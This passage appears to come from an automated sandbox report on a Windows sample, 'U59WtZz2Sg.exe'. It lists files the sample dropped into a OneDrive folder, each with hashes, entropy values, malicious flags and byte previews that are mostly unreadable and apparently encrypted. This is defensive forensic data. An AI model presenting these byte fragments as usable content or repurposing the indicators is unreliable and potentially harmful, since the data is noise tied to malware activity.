Preview:	<?xml..7&A......`..bt_.h$......O.%...4.U..Z.i...H`5w....S~.Cc.. "...C.... ...j.'D>....{.....^/...SdX..0.. p.<3.0e.x.L.J..I.....&1.k...A.C\|.0..p..._..5D{[u~..~..d.....ZuJ..9[.h..N....-C_.:O.q..J...O]...Nj...:.p^7y.h.......svR..\......!`.q%.b..fR3....};.^o.....ib.y.....X.Q3...5..y.rc...(..y....@...9.G..F....).....+IY...5...n.....K...6%........\.}:...........5r...b...}[bde...hV.~]...A.f:...h8..:.Rp....g...`..!.EH..AC...B......;..q.x...LR.+lP...Q8.{..k^.."AC....2...f......$.,...(.(..mD]....Y-.D.......R.c.. [5.......h....w..>S.].Z;...yb{..=.._i..hm)...O.F..-.c...%W..Uu.s...$2.et.WW.<..f<.7..j.a..........#.#.D...C...>.6(C`e...A....G...lO..."9k..Z..EE...\.(5.;i....$.:S..`C.3....$g.V._.4..{.k<..!a]H....oTob.......E.F.-... ..).9....D.OFT.U.H.v..z..`2.....V.._.`..&.6n)...}...z.T...A.%`...w.6...R....g......W.&e..3.^vw......}J.:..............!.s..T./HI..?8}PJ..#z........q.....d..z..c..,..xk..B>^EY.%.(fI62v..9.......j.c.Ps.g..T..K.ki9..a1..J..........qk..%..8

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\shield_icon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1549
Entropy (8bit):	7.858690387261894
Encrypted:	false
SSDEEP:	48:7zgWDhRL37EvqedxLCoDPVY0xKeUMUAlkSrD:7Ui3redBVDtYlMTlJ
MD5:	CDD4F8C59BA41A1B70FC58A766357499
SHA1:	FE6DC2C93B2D04546B11E46DA03126E0BA2576B2
SHA-256:	D734D76E76A43F84BD3CD50282BD7F7B652D574AF95C2B3DD435ACC2FD800E4D
SHA-512:	42413CB06E125CF7810597C1077EE7C63C222B9C5BC303D069E11A1D42D5ED08C4238A3D73E330153120B67BBFBD4FE10433C2B4136E4E22F7C14AEE6ABD3F1A
Malicious:	false
Reputation:	unknown
Preview:	<?xml.\|..G.s7...9w8y..s.G.k.U[@..E\|[.M.yu^...mx@?..T..q..!m^).....4.8.!Gpu@....2c...}u....m....]....i...s.S..;<L............vi%......[Z..,.?9n..<..Y..u$..`......5.U....G8y..88.......,.^f.o\H....C..Qw.....U.z...@.Iw5./....Vr.....y"$d.s..MYf..HA.....c]..p.i;..4I../../.............g.....F.HMk"..C7.......\|..}W.m............s.G1..+...GU..Cn_..Q..^..i.....oO.iq.er.h..WWb.A)G=5.^L5B..}g..Bg..NQ.T?.l/d.l...p...p.>..-.nmm.......D.p....".;...LA..2..d.........'Fw.... .K<..}Q)..!...E.s..U..8a ..{.....@g.7q7..q.....R....%tF;..."L......w;......U...:c.".1.^....@\|..!e..+.M......Z.,Qj...'..5j..b.a..?.;...].7....[.g..4.dn\ML.....L=H..532Y.5....dV..3.%n{jT..Kf...C.P`.A. R..]x...>(.!{Ft.....j..A..\.K. x.I..=..xAo......".om^N..3FT.d........ZI....#:.vu.....,...j...{..x....2.}.C.N..&.b` q^...U.A..1...>.jTV.8.f...L......_.e...F...>......1.Y..o...q....lS...h.._.hD....X....$.............R(..1..(......O...+.'...1:d$Y.....\...}..Pq....[..I!..y..#....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\signIn.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	11266
Entropy (8bit):	7.98368499982475
Encrypted:	false
SSDEEP:	192:tnbYvxaeEt04AuVnOsJyK/Wb2wvNKQgGmbGaOJihaH+CLrYoUAuyJkF:tnUax0+/WKwvHmaaOTeCLNcyJy
MD5:	9F0B83E7A0E7D44FEC474F43AC2A627F
SHA1:	4536522949F2666D610F34453C81683D7C87CF59
SHA-256:	6AF7D200ED8289CBE9EE887FD710F63E9DA7186EBAA4E00B4B4A50189A07C437
SHA-512:	6B104311D371BC6D5AAF4859552952E2F27E179C29A155406E06773DB1699D6E5900E1B703464E15A3CD30568959BDD0482B4C5EEA24DC900235254F1BE1A16E
Malicious:	false
Reputation:	unknown
Preview:	<svg ..?.J..6.8.....SR.....Y).~....R.E.s...VI./..?b....C.......R!......?ck...j..uS..m1T.....$....yE.t..!y-!:~.K.,..........@.z..F.Tk..mr..G.YU....N.{+..G..r(%(`ED...F3.bg.g'...9.....D....e6..(nS.....z...`.z..5....%L..M>^.....T.`....sK.......^.t...@]..J.[~.c..4.6.FL\.y ..~.4mr.S..\|.F..$........>..........n.....'>..:.6..:....<.H.j._..E....2Ft..-%.V.4e...0"....J.m..J\./....]..r..HA...+..+....v..x.L..M.H&........_..8(.\|.!.^..._1y.>w.:...[.f...n...7..WW-W0.2?.....Q.....4..dc2.... ..]..e.[.;.S$...,..b..q....9...t.J..f...."C....W.&.g..6...E.(..,...;0....r.Y:ys.h.L..Z...].8.q..\..4.......Nmb...$._]b...T..V..f...fT_.....@...v..:@.I..8.b}=.s....I..C..`!\?..\..Z..Y..0+..V...:w.......mb....9Q.....\|...0.N..../KY9{..S.sK_-'..7.W5pj......=..ox.;L{..^..A.0tZ.1..v.#.....e.T.....Q.V....x...:Ck+.?`~..[.[K..5.R.8q".,LQ.'.....H2.;....h-..u.....g1..Q....V.......@.w..e.....h.............q.'..QfJ....y...D.+l.4...@.s.j.^.=.w........K.L._..Ga.o..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\stackedIceCubes.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	5141
Entropy (8bit):	7.965599864384543
Encrypted:	false
SSDEEP:	96:QPZsUzPB+yiACLO7qk+jcBGzrZRLpSgwoX+/WK8qLa0rPIjS0S:QrzPJ7Cfpc+ZFgU+/PXVbRZ
MD5:	4704A8FBC0BFC3C2651B53AAE3505CED
SHA1:	50CDA50FB9E0A73BFDE1E4A64F9729A1DB638D55
SHA-256:	CCA08E7D951D1C34A2D0C7BCE390F124F9FB3DAE6D23ECE400E49B32460BA74F
SHA-512:	D8184FF7624BFC10D4C5E1668335A1C24B337C0D99376B7D499267BB82285081EF16AD7AF6F18A19034ABFF7F2425107B89E0E382BA9198B93DF37B51A6B900F
Malicious:	false
Reputation:	unknown
Preview:	<svg Zh...eM.VRec.]= .9.9..~-.O.'@[.'=ZM..6...O.>..:a....F.%..b....1..N.?..~..E.O.~..r.=..l...J3q...>L.9..."...=..._I..;..1_...(....;.]...ct..o..H.k.....}.&l.X...)....Fq....ns....z.b..-[.........X........H..q.;%.].y.F...\,.....Xh:..4\|..Y.F\|...........Q ..W........-....>....Z.+.AL.Nn..\/.p..=.PZ..c..JD......0.M...7.M........xD..GJ.[....z.B..........9.c...R#@.5...K8.........w...r...ZQ....B...R.;J...$......Nw.P]...9Z{.r..au.E(............kG0.k....ew.....'q.\|."}.W...l...Cc.j.~.&."..l.-.tf.`.......yQ4.;...D..N...4...O.T.1.Qfup.....6@...D..A.;)vg....z..Ci..q........v+B...b....#..- >...t......pJB...e-..A..6.8a.F..}.J7.(.A.........7.c^.KXl,a.P..g.\|.v.Y .8.p.tfl.7Q..x..P...3. .`g".Y&H.=..QIFOF.>..Q.f..D.d_....Q.(......-,...~.(.....F.Z<.8F.."......8e:..oE.........#f~.`..Q..h..T.&.r.Ri...!...W~..+7........!..h.\|.T/'.lL..9Adt.n=....P.....?.Z..1H.y.0`...DF.....+.,k..3...J-...B..J.9.Qz....Q'...B....p..N..hW...0.u.....+(m..gx.'.v...1.\|.h6#.L..../..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\vaultIntro.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	7497
Entropy (8bit):	7.974414750756543
Encrypted:	false
SSDEEP:	192:wkGM4eJkP/4Yq9F6qeg0rt74z8q2BjCrPaEijA5o:59k34T9zzIuWlj0o
MD5:	18AF9FB8843C23F21CEBDFA1B71780F5
SHA1:	457EE92CDB77FAE9C12BA4F97DCEA67948942A13
SHA-256:	EE30FF3DCC234697D9E73D5808FB8BA5E0AF28CE48BCEA3B872E682CEE6FFB03
SHA-512:	BC6052C95B7770ADAC3F76EB6FEF464D4859542A36155CA2971A625B84E3D2E8C2612194508221C03C5DB42100E84D4674EC64C8AC0E011B69E193AAD7ED8E19
Malicious:	false
Reputation:	unknown
Preview:	<svg ..y5.HT.....3.C.rs.K.p....'.e..3.:..4R..~.,.F....{....S[.EF.4../.~..}z.....t....B.....b...e5.w..<..U.).C.-`.....4+/....lO..h......sx..R.......@.0....y<.s......%..D_........>jE..ND..w..?...A.5;J.I..t.m.Gq ....V.,....P..^x....(.lm:..<O:>.....~.G.b.U..3.;....!.pF.a.c6.z(....r....eviO+X....D.hy....jD./.1n..r...,.J>:..E..O...d......V..[.#k.87...'..c%."....o-.v.......q1..m.g'.#..a..K`9K.W.]V.d......1XL.>...<.3.J.1.0.P.L..5]..Z...Z ..Q..7.O#.G1.-..0..........kZ...TIl'(.)...n.......u...e...1g..S..."3.@9.B.....<..o..`.dCp..A/.Cta..G.sp.j%t...U....}.?.j..D_....#..../..U..vD\|.._.l\.~R_E..f`-R0..d...M.EG.s..SC...8.n..e KF-[...obN.....S...N.?.=.......3!..~.3...V..i...F....8H.t,9..G`Y.cG..D....h.V.......#G..MT.[,..~...n/i]....`D"...y.:....E.E.....H....Y........]{..h..+.....+O....r......4!...J.".X.jm...U..+...A\|.\|@!.d."N.l.VV..51.8n/.}.=B.+...m.;.M?...Jr`o...i..]y..V..-.......q.[.AK.....yQ.B?.... w....7.{.K.%...b.R(..{rM;.......}.q......D....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\vaultUnlocked.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	7446
Entropy (8bit):	7.971412371734555
Encrypted:	false
SSDEEP:	192:K+QTmC8y///rDTfXTS5dLBzlp7iEjSeYg8UKAF:wmCxHzDDYLB5piaSq8UK6
MD5:	F89AEBCE7B8FB93823F49F80DE5C981E
SHA1:	8B806F4C84F8CAB97070A595FFC6E7EF1E9F03E4
SHA-256:	C1D2DCA85EFFB9B683B919E6588726B939AE8AA4AA1B2E919319C624EA7EACE8
SHA-512:	5E67B56AAA12CFC6CFA4EF3ACC0FB9CDE2658050BA2F1318321A2C5008095DAAEB94A22484D501E6015C24FAB2D10F29AAA5B45A35AC79978430B7F5E0F44F26
Malicious:	false
Reputation:	unknown
Preview:	<svg ..,V}.c.$JS8.......KA.A&m.f.#S.$......K.'.K.p%.{v..-.F.....E8a.<$..$p..GDW...L..k..T.A3..O...d0?y...D.m..-...........F%7ON....TR....L.o...2..6k8c2%..E..sV....F...z...o?...\|...3{..0\|.....7`,....<..;.......H...0.;.4.x.;.Q,..,\|...I.)~W....;.dZ.../...].K.k..!.....KY.......JL....6..:.a..$.RUu..Irg.g..)...K=...V...W.\|.TL..nu..\|..Z.h..~Z....TY[.Y.jF.}.Cs......sK....m....Q7...x.l@...{`..ZP$.N.b..e.....$.1.?v7.S".~.......T.....=F.m.wy?.br.'..q.`.F.eY....d.M.C3.-..ZdX..k....].'d(.....Q./>..:.e..s..G.}.r.......o.0.@.\...@..2.?.z.+q.....#.b.z(..\.>JQ....s...%..V-?.>W.e.p..c....As.\|..c.........g$F.d....D{KG.b....gJ..`l.K....s.L.w.F'..dF...F&k~....g.....-:.JIs@...5.....iK.'..../..`...3.1.....#Ozt;y.t...V;R.qa...'.5A.[q1z.w.vR........{.-....^....o.-......cs.#}..:.....iSc.0.#...Q.#X9v.L.}.......v.. .....#....G........<>..L.4..eszKm.pX.s..> "..sjC.+..X)....vL.%u}.mi....9..2#..6..j..d?L....8.0....Fj...p..vkk.u.[....%.....n.#.."....-.vr./..h...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\warning-symbol_grey.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	580
Entropy (8bit):	7.556768262883592
Encrypted:	false
SSDEEP:	12:tyNyDf23W9s4aLds4i1wIep0JxkmQu+YsxuQyZlv0eIUYtcii9a:tTD2O7aENeSnP+YQkZlvnIUubD
MD5:	CBFDC77DF387F4BBEA25451276DD5D99
SHA1:	33BE245503CDD867617239BE9CC0D8025A15C4AF
SHA-256:	BB77787B36485288153790B588D2778577AB5DCA52C4C528313AFB7C86A31262
SHA-512:	EAB272C3CD43605466DDAFB395F7420CADB9F076D0F6D49FB3AB1E11301D6B4E6E8AC6FEF4985D40949017FDDA7351FBDE75B6A2F0C479B4B8E8FB07985EADD2
Malicious:	false
Reputation:	unknown
Preview:	<svg -p$.^..Q......8"..>.k.H..E...6.....3L..]..3.-.v.A.R}uX...:.........2.B.$....Z.#A.(.....bJT...s.......A..A.V.s8Y..2b4. ..[..C......^.....Q..G. ..r3\|5H..y.....r...sB.[LQ.9.. .....u[xDg..6.p#x..u$n..H.i.j.A.rySZ.hXk3..&(U+$...,.PT...ws..g.]..;..v..e..5.Q..l.."K.X.>...3.....A-...P.Q.e}EN..A../(...(...'..{@..Y...!VR..t,........\|g..V..t....c.P-...q.T.....t..........>...[;.i..........Fi..4_.S..SS...)V.C.!U.W.Y,..p../FB....Q+c.....Gg..uE.."eL..K...9.._.A{.._.E....C../....K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\waterGlass.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	2171
Entropy (8bit):	7.895928579436487
Encrypted:	false
SSDEEP:	48:cdJJzNwHtYMZYgxccXwAKsLX2parizE8OpB/wD:GhwNxBxccXwLkX2SsOpBE
MD5:	C18CFEA2BC0DDE5F1DBE07689D83A4B1
SHA1:	B979782155004C8F1ED46E5DF8407736461F0370
SHA-256:	37D793F82A8AFCD68454EE55DE7527CFDA0F75A508980B7042CE1205ADA97C54
SHA-512:	3E3C3BCFAA9BD095A8288B1293ABF82412436814EFB02D154CBBF0252CA2B1C4188ABBBAF24706814FCE1A1EEBC800F55403E34AAB557B0D2403F120582EEEE1
Malicious:	false
Reputation:	unknown
Preview:	<svg i...d/.......D..D. ..g....?.........1......T...XE.j.......c.._..L.%..x..W./..7.Uam........a..j....?&).$$.........5.[..jQ.A..u....g....O6...F...u..H.w>t.dC...uRv...o~D.8.`.)/......i).M.j...^....U._..7..X8N...........%.M.SF#....px.)...........g..C..z.9.t..N..}x./FTf~........G..U.....t=...,......fr.`+.....~[..0#..Q..\...>.L...c7]%..V....^....i.".S..u...c..i...O.-..,E."..R..D..^.3^.,t..%YRP.6LuL..=[.._.......-4....yot.2...#....+....Q...f.sR+.#.!.Y......:...u.Y..fVL.F.^&6..E..)..~sW(_.,.:...........6...x.y.....C.R-.)9=B..-2.5..&e.Im8.i.j..8......k....Ay..T/4&d...1;....#.....N..d........oR......`..(...K...#..h..,.d..S....\..F.L......%..".R........x:.....o?7........s./.waO...)..e.........D.b...<....x...{....bv......:.y..;.......#....{..V..;....I....jL..D&.d...&At[..3.:.C...q..\|.../.......<.....;>..{R.5..J.k.sw.a......`...8m....d.S...}..zt..1....<....b...Sqa2.f~..M5..R;..l.../ .Y.d>......T`.p.A.N..A-..Pj.Dg.z.9P...{.<..y.4.7kb+...Q.O

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\is\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	198270
Entropy (8bit):	7.719183252711276
Encrypted:	false
SSDEEP:	6144:SlXYEqgCQNsCyT2iZp2jWCaKBbo7JmD/4ffsfpqN5Vzz2rligXq7Ju9WGzOs55Ar:NEqgCjCy7QWCaKBbo7p
MD5:	62447FBFA98D3886457ABB7FED4782E7
SHA1:	9121775F2D25D29F37674D82C4077B28CFE0ED6B
SHA-256:	4A4B144D754C5A4D020F31F7809EED7790F206B39B4C7D50F52B4097DAF8209F
SHA-512:	3351C92E188D8CA752AB832CCC1F4CF3FFE1ABD01B63460F9C8A582034A0E6BAB71486A4A32B7FD14FD92AF37C81442D2E3AB6F5635048E9C3345362FFD24297
Malicious:	false
Reputation:	unknown
Preview:	MZ........g.........5%.p......z..T.>#.L+:.)......$..H..Q...`i.l..<..n2.n#......>...n...1/KS.(.0..H...{..\|EEQ.6..q\|..zH...}.e..M.&.. ....O..R.cP.h...JH..<#..yLi..w...1-o."@..2....}.w..t..c...:~?.=.`....P....j. .#0.7.....v.y..t.....u.3.b..../a.2....7z.=..m.ol.Q..=.Q.....i.1aZwO.[....M...O..,.....Q`.'.....O@...x.6~Wys0...L......Is..[.....r.....{..... c...~M).tZ...3..>..D\|.M0J....%.....3...^...a.......]+.....y....LwQ>..Hc.Ew....nL.....+......nM.@..k.....owC.:)..e.~.}oy.`$....o...t..P+.\|.[.v...g$.>a......,...v....VZ...r...BzUEc..IN..../._...K ..[...%..<.J.E.kN...V..846.p..?U..........v...1#o...k..i.j\|2...=.k.)5._p.<....s....3.az>4.J.Y2.cZD.n..d../.J.A..o)F..%..`....-.T.vZ..Q.x.[t.bV.o%.Rt[c...F..........$Bb.v....H...Ae..%..._J`..........e....(.[...Lsj....$.....R...S..XW.T..{...U.}.l3f.O..h.$K..m......B.-M.O!....M>.t...\I.O.1.z..".%Q^..42..d..\.3..7Q.K.9.a0....z.a...Hs 8c...a.....@X.u...F..8..s.C@j65$p.R..I6.57..W"..."7qI.#..k.#z-:Q_=....+.:{......

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\it\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	210566
Entropy (8bit):	7.565354356121611
Encrypted:	false
SSDEEP:	3072:XeLW9OqvcwjtkPzjY51+PagKcKZTkQxBlYaJ/1kbbAKUe88txGYEmhVTlml5gTZJ:OLW9PUwBkIKCXuaz0L88DGYMlqj
MD5:	DF3CF13680AF0C2E0FC3C7E18FA5833E
SHA1:	DDE13B87B210AB504082357F330585227B2E62F8
SHA-256:	413DF1702E51A1659C0A60FE25043463500705C262AD666724F33B4B2C17EC29
SHA-512:	F5821F157F714343694877CB501980BF8C7991527FA32E126C4C953B8BD7A0D69F527DABBB17E278C53D6B9AE24CB459D88487E4BEB12844938F1F1F63243C4B
Malicious:	false
Reputation:	unknown
Preview:	MZ...............t....'H.k0.......8}._.P...p...q..0..:6.@.............X...3.`i..K.tA.)..V@,r..s.g.....kC......b.....(SD..i......Bon......T..]Qj.)....8.Q.....H5....p..;.....a.,........>...+.j...g.........?ve]...s.Z.U...~...4m.w.s...8^[.K..wt..c.w...."Gm..i..A.gn........c.8}.=.!...j..<;JZ.. ja...........r..m..........8.43..F.Qx.....?@.Hm9....T-H.(...i.._.&..gmn.......>..>y.1a..W... .Ha..\....y.p&z....X....R...].n...i.......+.-.F..9....-........Y...$.j33Jw/v'/0v&U......l..^..VZ.`......6....~...v...>.U\....T.zR3.."V.u".p9.../q...Sh+.?kC..9s.6.,_.jm.Fs.%...OiX..^b....p.p.u.,...6....G...=;.X...m...'.p..!@.yy..T..n.%....W..ZYK.s....r.lx..7 Z.Y..Xh._0e...._.#..z:.C%..0.8.cdi.{#...O..a...Q:.w........A..+#.....@....o.2..2\/...s.7.....pz..Bk..@.f8..vF.%S'........v.L.i...6%.MkrO6.D..._.Xl....w.4....R.v?m.7.jT^.A7.t..a.\..f.r./..Z....9..HS.n)',<.....\.N....i/../.....`sD...........2....../..O..C....k7b %{{;.i.4*.`!.c.S......yX.a.V.z.T.8/u....b8.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ja\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	126086
Entropy (8bit):	7.998518882668886
Encrypted:	true
SSDEEP:	3072:GPw4paoqMeWA4RpxjIpPldL+OopAWPtLsHBv9Am3eqKGU:2943QtLsHLAm3eSU
MD5:	ADA3D4B05A82B3B3851FA874A3512CBB
SHA1:	755AE40610441157AD6300571701225D995D8F55
SHA-256:	625BBE436F70A312969857973A0EA605D9BC3BBFA82C63AD077EA8A629F7BC75
SHA-512:	CC2CF7B77105D38C3546A4A963438BAE3C1707AE6DA0259D149FE5D1F025E12D4D44448A554F5101715894FD76246060E8D62ACCD73746F1C6DFB03FACDD99D0
Malicious:	true
Reputation:	unknown
Preview:	MZ...GnSnQq..H.....{wEj.0).l..m7..d...Z.......ff.00......d.g.,.A....ZcO.N.f....`..... H.....Xm[. SB...A:.....w.\|/e........".......^.=.,x.=q.......a.....>..?.`..z5S .U...=}=BsU./ci...4-.r....}......h>..%.+&.m.,@...<[.e<."..V=...!.$LY..D.I..bnn....T..d.B..&.U..#.1...@.....U..q.2..2.S.f .3u.weD+.p$x...j3......U..Q....&.`.......W.....z......SH[C/......@.iP..3.i....2....+....3k.D.;.....y.........i.G...).=7r..\|I$.<..m...Z=r.x.(...y.e.....f......F...W........6."..Q...g..~.". ....n.0y;. .9 V..~.C.Mb.W.L.A...2..L......`.F..-?.u.}.".F....n6P....,....c.pF..`"F..\|..E.5.r..G]"....+&..k.bf..xI.R.....qML.K!.....j...k......S.P..}..Po.......uY...g.y9\..U..6....RC..HjIs}.OYf.\.p......I.$....Xk.........)._..I....s.f..s...z.c..H.\|.RRRe\..uK./.vW..@}.;.R6...<...N.....6.BQ......W..a.nS.SH.........t.u.]?....'.~...........7....... .,...5.$t.S.....P..F...Vyri..TV...\|...:..~#...sX.._....+.3x_*..O=yC....s>u+.5l.lp....../"..!...i....U.........j..v.xg=...Dp.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ka\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	208302
Entropy (8bit):	7.678139233561158
Encrypted:	false
SSDEEP:	3072:7xztPQq+8SBd6/d0KdSYGSTEYZ8d/7SlO+lxxcJayBhXw3KN3XjfZaYK:n1sdOd0wO5dTc7xxcY6XH1e
MD5:	F17BBC41320A15F89D8321BC4698A60A
SHA1:	BF6683D160C1F834EADD0EC4F33BAFF3E4B4C05A
SHA-256:	C72A2675426E967878B18DEEA7DA25019948A289F6D0F5B99285A69D21C816A9
SHA-512:	5834178E4AF45EAD8B4DD981CAADCFAF3F45FD007ED9FA989C3A33E7DAF7024ADF937A517CEA08A98C27E53C435D669C9C538DBAF1CE0EAEBB0B0DCEF2C7B7EF
Malicious:	false
Reputation:	unknown
Preview:	MZ...\.......n..A.......W.K....).l..._%,.y`..\|..)....B...h>.k3..5.w..#IP...,.O.n..UR.<c.T...S.zXz..K.k.....@..W.Y.;..~?..U..g".\|..2U..6!.zY....di.....0Od[..l.....E...".r!~d..4....L.....T..?.$W.m...\q..U...E.. ).$ig.ty..:\.......$l..&.Y\..W.....w.KPS..!!.]...._t....d..'...(c..Z......P.ZC.. .B.u..1..p...$..Zd..,%.....7.c.&.....{.....+.P..P..jn...:.#..!.A^.B..6......e.r...4.1&.'...{....e.;....r..........\..c.Y..D[.iB .(....q...~.,..o..t..^..$.c...?2a2....s......`y..8..4..# T.Y...,t.._..us..N......p.%...H...l.iAjtS..{....b..&=.1..\|b..KU.nZ...Rnm..XK..T._.t.Fd@....2....../=y......F]{......... =...q.....q$!.q.....9)$6..:..w: .P.K.o..?..+..31....,.vf.zH.JU.}.j...m.]....<H......OHJ.X....FO..\\..s.K.(...8.\.t...lff...}...TR.[.E._..6..;S.....{...b..W.n<...$.N.. .3m.....1m..Z.<U_......Qe$6jo.....&....7....o....;.R3..B.........!S....qF....%..%0E.6...\|..,..o..d.....o.C...\&.4...06......x...h.Gn.(<.M.@....'...@;......'......}.G.n.U....H..\.A...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kk\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	214662
Entropy (8bit):	7.610439555009923
Encrypted:	false
SSDEEP:	3072:XfHZK0eS742RHNuDPXbHH5GRdWpPi4UWbWTTPP6XRESMbaEzX1:XPo7S7RR0LXFiWxHQDgEP9
MD5:	AD2C30F6735E0D4F5657C60210998092
SHA1:	738783FB1F93EEF848AAC8ED24BBFCB65BB71891
SHA-256:	C3BC6426BBD38BAD6E73DDB9D7BA299D5E58E53606A4A0A8FCE6E89B6AEB5FF0
SHA-512:	02E8ED1799B49C005DD3D9068BA62BCD94C87BC67F85986A853A605BC555C017709817991CF4026C26CEE589367B6490E35BCE8FF1ABFE7E66CAC82F956CE44A
Malicious:	false
Reputation:	unknown
Preview:	MZ........#..C.p. ..s.$.'....3.j...x.]...T....p.o'.j...."4q....Fl%.I....k.X;#......0..d..K-...[TC..aa..Y...i.......H....X.]....5G........ .U7i....P=KT....D......M...N..YV%.]v)..-).'...Z#.f+I-.P"....1....v7..~Yw.R...5.V..1k...t^..h..s.d.k.....g8.(.....U....L.}...c............O..9.........9.y...8&._......@..Te.x...x.;.........[..^.\|..\|H.m......t.;Ca..2p....(.7....y@.!W6.U.z...QKXM..S...g......0W3.......eYO.t_..E....=..0....S....%/(..RL...H5.q..u.T\|.X...,.-.\|./...;CB.. .....'D.P>?=....{............H...i...'vK.d..VO2........d(.P]...1_.\....j.b.:.8&s.....cU./a@A.Jk`i&.y..X\|.0...{U..;(.+m`..Au.r....'.-Q..l...9...r..Q...y&.,t=.!.y.z.(.X3.x...3.#..&.:yZ.!\|.N.G.L.cH..@.H$.A.A.-.s.j..8.W...P.}qz.}d.T>.."F..1..............2....O..!...A.....4o.?dt...)K..k...c.....T \|....l...u..7c...*.2.\|Fq....{.6v....X.-..2R...2...}..\U.L..O9HS...-......I.b.=.@.I.P..M..s?.%.....6!:.C.......F.N.Sn=.G.%x.....Xt.?.....!.@.......S.z.......vl.M.._.0...g~....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\km-KH\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	198302
Entropy (8bit):	7.797091012160723
Encrypted:	false
SSDEEP:	6144:86dct2efEeoa69ownnMDNVlmQSkTDS74lby8JyZ:RcAfeoa69oHD5jO74RS
MD5:	843F759CD884137C9024E2541252FAE8
SHA1:	15DE3DBC6207FC96BCA3BA04564AE3F44EF70F15
SHA-256:	D99DA71FC138A16B286AD8F0721DD4D2935229899003B57A27E9435A97F9D9EC
SHA-512:	803756A842B726073807D6F35A9C6860109E948405E2421CD0C9BA16CBB6A56E8E66E9B852B9F45A217819E9444D19442DA6C2A75996CD8C6605E8747BCF6654
Malicious:	false
Reputation:	unknown
Preview:	MZ...'..&:...7*x....<..)s.?i....P..R..U..........(..[w9..#%..`.BH0.;..by..Z....;.....6.0z!Rg[......3\N.6.....YzH@<..L.n..B1pK...........P2.D....2....T..u.y...B.z...Y.U.$........1....(...].g..>C.Kc.R..Q.yDnJ.y..mH..`.w...g.yP...y....ut.L.(....3G.....x#...Fa...'.." pp..>.;0.@'.A../X....a........%..:.9]G9e5..x.......<.O:&NiZ1Z\Q.Z.y...L.3.`$.{.....d.n.......]Z.....r?.a.X&..+.i..{.....Y....~k.J..!..e.-W.V.._..\|w......_s%.\r:P......m...M-.....c......+.&...d+)5.D.....g.{PeW.....\..c...Y.z..FU./.f..V=.S....[M.$.....';..:...4..w&.R..Y.ws...Jl.?8.K....,.C.?.U..........~..:'..=.7..]M.....0....uA]...vb.6...k.5..(U.O...\..n.X:T\|psEg.E..F_...Y.....F.....qowt...0~@j..u...=..4..H{...W..k......]#.y..p.M..W(.dPr.9J....TJBp...Hm.2.....+/.X..........fr.G.\5P.#.a`...^......v..6.r................&..A&..:...y....j.H.T4...v.c.C;......?m....y.i....q{.dV1..IV.w.a...fPQi.;.ob.1.df.r.#...jk..{.G6g.....u..+..v....$s.yJ....p.8Q&.oD....F.5.@..0;..`...e.l..Zs..bJ.;.....Q

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kn\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	215686
Entropy (8bit):	7.61354648630117
Encrypted:	false
SSDEEP:	6144:JnfvtgyBsFybRAtDrBNbX0iEVFRIE6/kXfN15P:Nvtp2IGDrBNb4IDMT5P
MD5:	7735297AAAD1F420BE33C190549ED25F
SHA1:	835F4580440D2E6B6674EB4D0DA9E7CA39216386
SHA-256:	7B64DF465234E0827A6C4DC7A3942B07E715F0D28809DEA287194204C48C3297
